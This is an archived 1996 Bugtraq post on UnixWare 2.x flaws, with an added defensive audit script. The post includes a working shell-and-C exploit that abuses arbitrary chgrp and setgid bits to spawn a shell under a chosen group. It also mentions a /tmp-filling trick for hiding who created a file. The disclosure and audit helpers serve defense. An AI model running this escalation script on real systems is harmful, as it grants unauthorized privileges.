Bugtraq mailing list archives

More on UnixWare 2.x vulnerability


From: tv () pobox com (Todd Vierling)
Date: Sat, 24 Aug 1996 14:48:48 -0400


I've found out more about UnixWare 2.  It seems the system (and I don't
know if SCO's own native OSs do this, SCO UNIX/SCO XENIX/SCO OpenServer)
allows chown'ing a file *to* any arbitrary user and group.  Hm, lessee.
Create a file that uses up all the available space in /tmp, then chown it
root:bin.  Okay, now someone else tell me who created that file.

Anyway, back to the setgid problem.  I've found an exploit script (it's not
all that difficult to do by hand, anyway...) on an FTP site pointed to by
the floating post about this bug.  It follows.  While browsing the default
installation of UnixWare, it seems a couple *hundred* directories, including
particularly /usr/bin, /sbin, and /usr/sbin, are writable by group.  This is
bad, very bad.

=====

#!/bin/sh
# cgroup - pick a group id for unixware (run as cgroup <groupid>)
cat >/tmp/.$$.c <<_end_
#include <unistd.h>
int main(void) { setgid(getegid()); execl("/bin/sh", "-", 0); }
_end_
cc -o /tmp/.$$ /tmp/.$$.c
rm -f /tmp/.$$.c
chgrp $1 /tmp/.$$
chmod 6100 /tmp/.$$
/tmp/.$$
rm -f /tmp/.$$

=====
== Todd Vierling (Personal tv () pobox com; Business tv () iag net) Cast a vote! ==
== System administrator/technician, Internet Access Group, Orlando Florida ==
== Dialups in Orange, Volusia, Lake, Osceola counties - http://www.iag.net ==
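The two conditions the post describes, group-writable system directories and setgid binaries whose group was chosen by an ordinary user, are both things an administrator can inventory with `find`. The script below is an added example written for this archive page, not code from the original post or from SCO; it assumes a POSIX `find` that accepts octal `-perm` arguments and takes the directories to audit as command-line arguments.

```shell
#!/bin/sh
# Audit helpers (added example, not from the original post).
# Usage: sh audit.sh /usr/bin /sbin /usr/sbin

# List directories under the given roots that carry the group-write bit.
# On any Unix, a group-writable system directory lets every member of that
# group add or replace programs that other users (and root) will execute;
# the post reports a couple hundred such directories in a default UnixWare 2
# install.  Octal -020 is used instead of -g+w for portability to older finds.
list_group_writable_dirs() {
    find "$@" -type d -perm -020 2>/dev/null
}

# List regular files under the given roots that carry the setgid bit.
# The script in the post works by chgrp'ing a binary to an arbitrary group
# and then setting this bit, so a setgid file owned by an ordinary user, or
# one in a group that does not match the packaged file, is the thing to look
# for in this output (pair it with ls -ld to see owner and group).
list_setgid_files() {
    find "$@" -type f -perm -2000 2>/dev/null
}

# Succeed (exit 0) only when no group-writable directory exists under the
# given roots; usable as a one-line check from cron or a login script.
check_tree_clean() {
    [ -z "$(list_group_writable_dirs "$@")" ]
}

# Report when invoked with directories; when sourced with no arguments the
# functions are simply defined.
if [ $# -gt 0 ]; then
    echo "group-writable directories:"
    list_group_writable_dirs "$@"
    echo "setgid files:"
    list_setgid_files "$@" | while read -r f; do ls -ld "$f"; done
fi
```

`-perm -2000` matches files with the setgid bit regardless of the other mode bits, so the `chmod 6100` in the post's script (setuid and setgid set, only the owner execute bit otherwise) is caught as well as the more common `2755`.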